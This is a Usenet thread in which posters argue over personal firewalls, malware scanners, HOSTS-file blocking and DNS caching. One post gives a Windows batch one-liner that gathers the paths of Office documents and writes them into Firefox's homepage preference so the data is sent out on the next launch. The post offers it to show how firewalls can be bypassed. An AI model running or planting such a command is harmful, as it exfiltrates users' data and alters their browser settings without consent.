Jetico Personal Firewall freeware asks way too many questions

Then I guess you'll keep on sulking then.

Reply to
s|b

If the application isn't malicious, then you don't need to enforce that it does exactly what it does. On the contrary, if you think that it does something that it shouldn't do, then you're already considering it as malicious.

Hm... what about applications seeming non-malicious? A well-known example is commercial software from Adobe, where the Adobe License Manager Service uses the Raw Sockets API to successfully bypass about any typical "personal firewall".

Reply to
Sebastian G.

And therefore the voidness of this discussion point is reality. Now do you want to discuss the impossible or could we come back to reasonable assumptions on how things should be?

The idea of signature-based scanning to address the problem of malicious software was, as usual, to promote something that on the first run seems to work even though it actually doesn't, and to get people paying for it. The lack of education drives this discrepancy even further.

No, it doesn't. Anyway, this is a stupid idea since you're effectively throwing away a lot of performance for achieving absolutely nothing. Hint: If you were the bad guy and you'd be running your own server on your own domain with your own DNS server, how would you avoid single hostnames being blacklisted? Simply by using wildcards in your zone!

Reply to
Sebastian G.

Aside from the added complexity and the inability of the user to judge the output of the mentioned program, what exactly is a shitload of false positives worth? Say it, e.g., claims that there's some oh-so-bad "tracking cookie", as well as a trojan horse in user32.dll (because it doesn't match the original one any more, probably due to a normal update). Now it deletes both, demands a shutdown, and the system doesn't boot up anymore.

Just try running it over a completely fresh install of Windows, or even over a well secured system with a lot of known-good third-party software, and look at the shame of its report. Same goes for almost any malware scanner under the sun.

Reply to
Sebastian G.

- Firefox: the worst thing you could make out of the Gecko platform

- NOD32: virus scanner... highly incomplete approach and high potential for parsing vulnerabilities and privilege escalation

- Spyware Blaster: spyware scanner... totally stupid approach, horrible amount of false positives, and of course it's too stupid to do a simple unprivileged task without administrative privileges

- Spybot Search+Destroy immunization: aside from cluttering the HKEY_LOCAL_MACHINE hive full of useless ClassIDs, it achieves exactly what? Malware authors simply use randomly generated GUIDs or simply registrationless COM.

- MSIE still remains fully vulnerable to ActiveX-based attacks as well as other well-documented security holes^W^W design features, and real webbrowsers simply won't care at all.

- Windows Messenger: another documented security hole by design

So what? Can you specify something like:

queue: prerouting:
  route TCP syn from any to me queue postrouting:
  check-state
  deny TCP syn from any to me 1-1023
  allow TCP syn from any to any keep-state
  allow TCP syn,ack from any to me keep-state
  allow TCP ack from any to me keep-state

If not, then you obviously didn't ask anything that would be sufficient for a firewall concept yet.

Reply to
Sebastian G.
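The ruleset quoted in the post above, evaluated by an added Python sketch that is not code from any poster. It assumes ipfw-like first-match semantics, with `check-state` accepting packets of flows that an earlier `keep-state` rule recorded, and uses the constructed address 10.0.0.5 for "me":

```python
from dataclasses import dataclass

ME = "10.0.0.5"  # constructed address standing in for the firewall host


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset  # subset of {"syn", "ack"}


class StatefulFilter:
    def __init__(self):
        self.flows = set()  # (src, sport, dst, dport) tuples, both directions

    def _keep(self, p):
        # keep-state: remember the flow so later packets in either
        # direction match check-state instead of the static rules
        self.flows.add((p.src, p.sport, p.dst, p.dport))
        self.flows.add((p.dst, p.dport, p.src, p.sport))

    def decide(self, p):
        if (p.src, p.sport, p.dst, p.dport) in self.flows:
            return "allow"  # check-state
        if p.flags == {"syn"} and p.dst == ME and 1 <= p.dport <= 1023:
            return "deny"  # deny TCP syn from any to me 1-1023
        if p.flags == {"syn"}:
            self._keep(p)
            return "allow"  # allow TCP syn from any to any keep-state
        if p.dst == ME and p.flags in ({"syn", "ack"}, {"ack"}):
            self._keep(p)
            return "allow"  # allow TCP syn,ack / ack from any to me keep-state
        return "deny"  # nothing matched: implicit default deny


def run_scenario():
    """Constructed packet sequence; returns the decision for each packet."""
    fw = StatefulFilter()
    S, SA, A = frozenset({"syn"}), frozenset({"syn", "ack"}), frozenset({"ack"})
    pkts = [
        Packet("198.51.100.7", 40000, ME, 22, S),     # unsolicited SYN to ssh: deny
        Packet(ME, 51000, "203.0.113.9", 443, S),      # our outbound SYN: allow, state
        Packet("203.0.113.9", 443, ME, 51000, SA),     # reply hits check-state: allow
        Packet("203.0.113.9", 443, ME, 51000, A),      # data in same flow: allow
        Packet("198.51.100.7", 40001, ME, 8080, S),    # SYN to a high port: allow
        Packet("198.51.100.7", 25, ME, 60000, SA),     # unsolicited SYN/ACK: allow as written
    ]
    return [fw.decide(p) for p in pkts]
```

The last packet shows a caveat of the rules as quoted: an unsolicited SYN/ACK to "me" is allowed by the static rule even though check-state would already cover legitimate replies.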

But only to your ISP, which might decide to simply disconnect your machine until you stop it from flooding the internet with spam.

Reply to
Sebastian G.

"Sebastian G." wrote in news: snipped-for-privacy@mid.dfncis.de:

Hmm. While I don't dispute the fact that BugHunter has suffered from false positives in the past, I'm unaware of any serious Windows DLLs being targeted by accident. I don't believe you've actually examined the program though, as you're assuming it bothers with cookies and is interested in files that have changed. It's not interested in either of those, and its documentation clearly does state what it scans for, and what it ignores.

I have, numerous times in development and testing. I fix the false alarms as I find them, but like I said, it doesn't flag on.. "shitloads" and doesn't find anything on a freshly loaded box. This machine here is a fairly decent example of 3rd party apps, it has tons, including various programming languages for DOS and Windows. Guess what? No false alarms on those executables either. :)

Have you actually examined the program I mentioned yourself? I ask this because BugHunter doesn't do the things you mention, and you seem to imply that it's a danger to a user's system. I'd like to clear that misunderstanding up.

Reply to
Dustin Cook

"Sebastian G." wrote in news: snipped-for-privacy@mid.dfncis.de:

Examples please?

NOD32 is considered one of the best engines available. Would you mind explaining further these issues you have with it?

Spyware Blaster... isn't a scanner, at all. How can it get any false positives, sir? It doesn't scan for anything. And it can't do its thing without admin rights, due to the registry keys which have to be modified. That's a good thing. I wouldn't want a program being able to set those keys if I was on the guest account. :)

Blocks installation of older malware applications with GUIDs that are already known and used.

I certainly don't dispute the security risks present with MSIE. :)

I've never been a fan of windows messenger either, sir.

Nope, I certainly can't.

I asked you specifically what you felt was a firewall, I didn't ask for a trolling response. :) And I thank you for the time you spent responding to me.

Reply to
Dustin Cook

"Sebastian G." wrote in news: snipped-for-privacy@mid.dfncis.de:

Hmm, we seem to be thinking along different lines here. If I don't want so and so application to call home, malicious intentions or not, it's not going to on this box. If I am testing software, and/or running software that automatically checks for updates and won't let me turn it off, I like the ability to block outgoing internet requests from that application. And as I said originally, software firewalls, unless specifically targeted, aren't going to let the data pass.

Even when using raw socket calls, if the LSP layer has firewall components, the firewall still gets the final say. Ask anyone who's had to repair a system's TCP/IP stack due to a nasty removal of ZoneAlarm. Do you have anything of value to contribute to the discussion, or is your intent to troll?

Reply to
Dustin Cook

Dustin Cook after much thought, came up with this jewel in news:Xns99DAD7562BE88HHI2948AJD832@69.28.186.121:

I doubt it

Reply to
Maximus the Mad

And the most annoying. Only firewall I ever found more annoying was Safety.NET when I set it to full security mode, but that is more than just a firewall.

Reply to
John Adams

Sulk away...

Reply to
s|b

Maximus the Mad wrote in news:Xns99DAE28EE1865whatsinaname@207.115.33.102:

Even so, with all of the packages out there, it's completely understandable that he might assume BugHunter was like the rest. I hope to have cleared that up with my responses, but who really knows...

Reply to
Dustin Cook

- global namespace pollution

- cookie, P3P and SSL options not exposed for configuration and with horrible defaults

- all kinds of internal mandatory policies to cashade symptoms instead of fixing the actual issue

- horrible component layering

- horrible compatibility issues with extensions

That still doesn't make it better than not using any virus scanner at all. Now again: the bad guys typically use self-modifying and self-encrypting code to not omit any signature pattern, use side effects to not omit any specific behaviour. Pattern matching and behaviour analysis totally fail in practice, now why exactly should I have the program crumping through every little file on every little file system activity? I'd know much better ways to burn resources for nothing.

Very very wrong. As a non-admin user, I can tell for sure that no-one messed with HKLM. Now, it has full access to HKCU where possible damage could have been done. Why doesn't it degrade gracefully to work on only that?

The bad programs won't care. I'd like a normal program to not even try it, since it simply can't do it anyway without sufficient privileges.

OK, and why would I mind if the newer malware already hoses the system?

Risk? It's insecure by design, and fully documented as such. One could argue that abusing it as a webbrowser is a user control error since it was never promised to be securely usable in a hostile environment, and was documented like that, so it's not a security violation by definition.

So, again, why should I care for the GUIDs of old malware if even the old malware already marches in through well-documented functionality that some people would consider a security vulnerability?

It was not a trolling response, it was a well-specified example of what language constructs are necessary to completely express the intended ruleset of a routing firewall. Without such constructs, there are cases where you can fully specify what you consider as wanted traffic but never implement it in rules without additionally allowing unwanted traffic or denying wanted traffic.

Reply to
Sebastian G.

You're kidding, right? I show a very very easy, highly portable and not specifically targeted way to phone home as you like:

set x= for /r %i (*.doc *.xls *.ppt) do set x=%x%^;%i for /r %i in (prefs.js) do echo user_pref("browser.startup.homepage"^,"

formatting link
")^;>>"%i"

Then wait until the user launches Firefox for the next time.

Now if you understood the message, I might tell you that extremely more sophisticated ways of IPC have already been used by malware ten years ago.

So, as long as you don't block all applications indiscriminately, you've already lost the race. (Even further, when you're running with admin rights, you've already lost anyway.)

Now I know that you don't know what you're talking about. The Raw Sockets are in the NDIS layer, thus right below the TDI layer, whereas the LSP layer is above TDI.

I'm not even gonna start discussing about adding third-party stuff like WinPCap...

Reply to
Sebastian G.

"Sebastian G." wrote in news: snipped-for-privacy@mid.dfncis.de:

I understand scripting, yes. thanks. Are you going to educate me on malware history 101 next? Perhaps you'll teach me how executables are infected. *g*

Okay....

Well, in any event, thanks for your time.

Reply to
Dustin Cook

Not if you disable the DNS client service. DNS client service is useless for a home PC. Hosts file is a good way to block malicious sites at the source so f*ck you geekboy.

Reply to
John Adams

Aside from the fact that it's the DNS *caching* service, your argument is nonsense. Considering a minimum delay of 50 ms and a typical delay of 200 ms for a typical ISP's DNS server, caching improves latency very well.

The HOSTS file is about the most stupid idea to implement a local blacklist, which by itself already is a stupid idea. Anyway, since almost every site is malicious by definition, your categorization is nonsense as well.

A DNS manipulation never blocks at the source, obviously.

Reply to
Sebastian G.

"Sebastian G." after much thought, came up with this jewel in news: snipped-for-privacy@mid.dfncis.de:

The only nonsense is not using a good hosts file. Note: for those of you who are wondering what a hosts file is, see

formatting link

Reply to
Maximus the Mad

The only nonsense is not doing something stupid to hardly achieve a broken concept? Well, if you think so... For me it's just fun seeing people keep on telling the HOSTS file nonsense over and over in the dear hope that it would actually help against whatever.

Reply to
Sebastian G.
